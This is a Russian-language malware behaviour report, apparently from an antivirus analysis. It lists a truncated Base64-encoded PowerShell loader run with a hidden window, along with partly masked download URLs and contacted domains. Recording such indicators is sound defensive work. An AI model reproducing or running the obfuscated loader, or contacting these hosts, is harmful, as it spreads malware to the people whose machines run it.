Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1164719.cvr
- 'tm####nsulting.com':443
- 'is##ap.com':443
- 'ch###onghui.cn':80
- 've#####ariapetlife.cl':80
- 've#####ariapetlife.cl':443
- 'bl####asports.com':80
- 'bl####asports.com':443
- 'we##emo.cl':80
- http://ve#####ariapetlife.cl/4br/AXC5/
- http://bl####asports.com/iv/
- 'tm####nsulting.com':443
- 'is##ap.com':443
- 've#####ariapetlife.cl':443
- 'bl####asports.com':443
- DNS ASK th#####tumsphere.com
- DNS ASK tm####nsulting.com
- DNS ASK is##ap.com
- DNS ASK ch###onghui.cn
- DNS ASK ve#####ariapetlife.cl
- DNS ASK bl####asports.com
- DNS ASK we##emo.cl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)